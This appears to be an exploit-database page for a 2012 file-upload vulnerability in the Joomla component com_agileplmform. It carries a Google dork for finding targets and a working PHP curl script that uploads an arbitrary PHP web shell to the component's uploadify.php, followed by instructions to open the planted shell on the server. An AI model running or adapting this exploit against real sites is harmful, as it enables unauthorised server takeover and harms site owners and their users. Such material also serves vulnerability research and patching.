Joomla com_agileplmform file upload vulnerability

2012.08.04
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

+----------------------------------------------------------------------+ # Exploit Title: joomla component com_agileplmform file upload vulnerability # Google Dork: inurl:components/com_agileplmform # Date: 04/08/2012 # Author: Tunisian spl01t3r ____ (_) ____ ___ ( _ \| |( _ \ / _ \ | | | | || | | x |_| | ||_/|_|| ||_/ \___/ |_| |_| _ (_) ____ ____ ____ _____ | | / __| / __| \__ \ / ` \ | | \___ \ \___ \ / _ \_ | Y Y \ |_| |____/ |____/ (___ / |_|_| / \/ \/ +----------------------------------------------------------------------+ [+] exploit <?php /* example of using $uploadfile="C:\AppServ\www\Tunisia.php"; */ $uploadfile="C:\AppServ\www\b.php"; $ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/components/com_agileplmform/views/agileplmform/js/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [+] how TO use Tunisia.php must be the devil file 3:) !!!shell!!! TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/ Filename : $postResult output +----------------------------------------------------------------------+ [+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ; jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;) daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ; hassen ben mbarek ; prince bibou ; hag whag ; anis van toets & all tn_spl01t3r's freinds mAhna mAhna [+] profile : www.facebook.com/TN.spl0it3r +----------------------------------------------------------------------+

References:

http://www.facebook.com/TN.spl0it3r


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top